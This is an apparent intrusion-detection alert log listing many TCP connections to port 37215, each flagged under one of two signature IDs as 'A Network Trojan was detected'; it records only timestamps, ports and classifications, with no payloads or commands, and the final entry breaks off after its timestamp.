          Timestamp:05/28/24-14:47:28.399503
          SID:2835222
          Source Port:56732
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273542
          SID:2829579
          Source Port:50864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.160536
          SID:2829579
          Source Port:52036
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.278267
          SID:2835222
          Source Port:43390
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.707961
          SID:2829579
          Source Port:44402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.708835
          SID:2829579
          Source Port:48088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:56.336922
          SID:2829579
          Source Port:56494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983591
          SID:2835222
          Source Port:57498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.471283
          SID:2829579
          Source Port:49082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.206881
          SID:2835222
          Source Port:39000
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.893997
          SID:2829579
          Source Port:56010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.873823
          SID:2829579
          Source Port:42278
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.039865
          SID:2835222
          Source Port:33916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.174069
          SID:2829579
          Source Port:47824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.693311
          SID:2829579
          Source Port:51564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.332637
          SID:2835222
          Source Port:55180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744946
          SID:2835222
          Source Port:54490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.723881
          SID:2829579
          Source Port:36428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922058
          SID:2829579
          Source Port:49664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.979172
          SID:2829579
          Source Port:54812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.604852
          SID:2829579
          Source Port:58124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147455
          SID:2835222
          Source Port:44554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.157598
          SID:2829579
          Source Port:49186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.878666
          SID:2835222
          Source Port:52152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.671450
          SID:2835222
          Source Port:53056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.153044
          SID:2835222
          Source Port:59728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.177864
          SID:2835222
          Source Port:52754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.473599
          SID:2835222
          Source Port:60816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.728449
          SID:2829579
          Source Port:51336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102324
          SID:2835222
          Source Port:32816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845855
          SID:2835222
          Source Port:36218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.209331
          SID:2829579
          Source Port:58092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.554714
          SID:2835222
          Source Port:44510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.808871
          SID:2835222
          Source Port:41632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222572
          SID:2835222
          Source Port:48888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208148
          SID:2829579
          Source Port:35304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.989424
          SID:2829579
          Source Port:43532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.033073
          SID:2829579
          Source Port:45920
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.623566
          SID:2835222
          Source Port:40406
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.877694
          SID:2835222
          Source Port:52274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.141797
          SID:2829579
          Source Port:47204
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.535228
          SID:2835222
          Source Port:42032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.686993
          SID:2829579
          Source Port:39284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.197212
          SID:2835222
          Source Port:37380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.064565
          SID:2829579
          Source Port:53302
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147324
          SID:2829579
          Source Port:35888
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.922203
          SID:2835222
          Source Port:44860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.334659
          SID:2835222
          Source Port:58978
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.214818
          SID:2829579
          Source Port:59882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102962
          SID:2829579
          Source Port:44464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.542300
          SID:2835222
          Source Port:50524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.041902
          SID:2829579
          Source Port:59614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.208045
          SID:2835222
          Source Port:54126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.322909
          SID:2835222
          Source Port:56132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.774685
          SID:2835222
          Source Port:49836
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.105738
          SID:2829579
          Source Port:36164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.551776
          SID:2829579
          Source Port:56014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.710264
          SID:2829579
          Source Port:56320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.764453
          SID:2835222
          Source Port:33490
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.724332
          SID:2835222
          Source Port:36192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.705688
          SID:2829579
          Source Port:47332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.803184
          SID:2829579
          Source Port:53094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.324644
          SID:2829579
          Source Port:55264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466203
          SID:2829579
          Source Port:42928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.817675
          SID:2829579
          Source Port:45630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491263
          SID:2829579
          Source Port:35430
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.401283
          SID:2829579
          Source Port:45334
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.698193
          SID:2835222
          Source Port:59322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591323
          SID:2835222
          Source Port:43456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.181629
          SID:2829579
          Source Port:58936
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.432497
          SID:2829579
          Source Port:53340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.202116
          SID:2835222
          Source Port:51088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.713308
          SID:2835222
          Source Port:41020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.926999
          SID:2829579
          Source Port:48572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.116686
          SID:2835222
          Source Port:51106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.983556
          SID:2829579
          Source Port:60090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.225773
          SID:2829579
          Source Port:41884
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.269302
          SID:2829579
          Source Port:41136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.222782
          SID:2829579
          Source Port:40094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.214676
          SID:2829579
          Source Port:42010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195770
          SID:2835222
          Source Port:54386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.959017
          SID:2835222
          Source Port:45082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.142798
          SID:2835222
          Source Port:40674
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.234760
          SID:2835222
          Source Port:40270
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.663263
          SID:2829579
          Source Port:38938
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272292
          SID:2829579
          Source Port:47640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.266262
          SID:2835222
          Source Port:52644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.922970
          SID:2829579
          Source Port:51618
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269132
          SID:2829579
          Source Port:43928
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528808
          SID:2835222
          Source Port:42214
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.090928
          SID:2829579
          Source Port:37768
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.847472
          SID:2829579
          Source Port:59816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943269
          SID:2829579
          Source Port:51198
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.307177
          SID:2829579
          Source Port:53296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112238
          SID:2835222
          Source Port:39940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087683
          SID:2835222
          Source Port:50360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:49.113253
          SID:2835222
          Source Port:38898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.465371
          SID:2829579
          Source Port:57754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.913837
          SID:2835222
          Source Port:39864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907616
          SID:2829579
          Source Port:52126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.613756
          SID:2829579
          Source Port:53264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.463998
          SID:2835222
          Source Port:58306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.962833
          SID:2829579
          Source Port:46120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.635198
          SID:2835222
          Source Port:38986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.891920
          SID:2829579
          Source Port:51352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.341318
          SID:2829579
          Source Port:34502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.890365
          SID:2835222
          Source Port:38826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.529048
          SID:2835222
          Source Port:50616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.561988
          SID:2829579
          Source Port:56914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.087815
          SID:2829579
          Source Port:52260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943316
          SID:2829579
          Source Port:52340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.945483
          SID:2829579
          Source Port:44966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213295
          SID:2829579
          Source Port:44964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.652521
          SID:2829579
          Source Port:32844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:36.668567
          SID:2829579
          Source Port:46158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842295
          SID:2829579
          Source Port:43188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.973190
          SID:2829579
          Source Port:36134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.112866
          SID:2829579
          Source Port:46552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.245570
          SID:2829579
          Source Port:42856
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.669492
          SID:2829579
          Source Port:45274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.231714
          SID:2835222
          Source Port:51170
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528922
          SID:2829579
          Source Port:43042
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204524
          SID:2829579
          Source Port:39324
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.543165
          SID:2835222
          Source Port:36510
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.103292
          SID:2835222
          Source Port:50798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.332630
          SID:2829579
          Source Port:48676
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.735957
          SID:2829579
          Source Port:38032
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466179
          SID:2829579
          Source Port:48256
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:16.977539
          SID:2835222
          Source Port:60336
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.299033
          SID:2835222
          Source Port:33570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.399928
          SID:2829579
          Source Port:38524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.591391
          SID:2835222
          Source Port:37158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:08.744268
          SID:2829579
          Source Port:49706
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.847829
          SID:2829579
          Source Port:33778
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:46.978878
          SID:2829579
          Source Port:40022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.466236
          SID:2835222
          Source Port:56704
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.842351
          SID:2829579
          Source Port:41112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.295492
          SID:2835222
          Source Port:57460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.215259
          SID:2829579
          Source Port:56572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.772128
          SID:2835222
          Source Port:54290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.077729
          SID:2835222
          Source Port:54832
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:42.841065
          SID:2829579
          Source Port:39722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.907607
          SID:2835222
          Source Port:36360
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.536269
          SID:2829579
          Source Port:38588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.822544
          SID:2835222
          Source Port:39156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.845264
          SID:2835222
          Source Port:50664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.939501
          SID:2829579
          Source Port:35482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.475735
          SID:2829579
          Source Port:41722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.597367
          SID:2829579
          Source Port:35004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215063
          SID:2835222
          Source Port:45554
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.588721
          SID:2829579
          Source Port:56738
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:32.528293
          SID:2835222
          Source Port:49848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.711542
          SID:2829579
          Source Port:41792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.062033
          SID:2835222
          Source Port:43188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.204817
          SID:2829579
          Source Port:46364
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.227958
          SID:2829579
          Source Port:37044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:00.476796
          SID:2829579
          Source Port:43820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:30.491466
          SID:2835222
          Source Port:33438
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.943511
          SID:2829579
          Source Port:56464
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.229122
          SID:2829579
          Source Port:34986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.545767
          SID:2829579
          Source Port:49568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.242071
          SID:2835222
          Source Port:53652
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.350368
          SID:2829579
          Source Port:36034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.269759
          SID:2829579
          Source Port:42440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:40.819065
          SID:2835222
          Source Port:41498
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.272813
          SID:2829579
          Source Port:48368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:54.195968
          SID:2835222
          Source Port:46014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.081344
          SID:2829579
          Source Port:46770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.090443
          SID:2835222
          Source Port:38106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.017617
          SID:2835222
          Source Port:50320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:51.147379
          SID:2835222
          Source Port:43022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:02.543497
          SID:2829579
          Source Port:50356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:06.712210
          SID:2829579
          Source Port:54496
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.857225
          SID:2829579
          Source Port:49950
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:58.298545
          SID:2835222
          Source Port:39120
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:17.010531
          SID:2835222
          Source Port:48084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:12.849132
          SID:2829579
          Source Port:59234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.358070
          SID:2829579
          Source Port:41590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:52.102250
          SID:2835222
          Source Port:54126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.272030
          SID:2835222
          Source Port:35798
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.215690
          SID:2829579
          Source Port:56202
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:38.738566
          SID:2835222
          Source Port:54046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.890019
          SID:2835222
          Source Port:55596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:10.815308
          SID:2835222
          Source Port:58864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:55.273310
          SID:2829579
          Source Port:37646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:19.082828
          SID:2835222
          Source Port:47780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.244785
          SID:2835222
          Source Port:41642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:28.430299
          SID:2829579
          Source Port:40234
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:23.213349
          SID:2835222
          Source Port:48428
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:34.600626
          SID:2835222
          Source Port:42986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:44.914727
          SID:2835222
          Source Port:41310
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:26.320954
          SID:2829579
          Source Port:43736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:53.206429
          SID:2829579
          Source Port:56982
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:14.944027
          SID:2829579
          Source Port:55472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:21.137710
          SID:2835222
          Source Port:37708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:04.594677
          SID:2829579
          Source Port:57640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:47:25.267191
          SID:2835222
          Source Port:49164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:05/28/24-14:46:56.239459
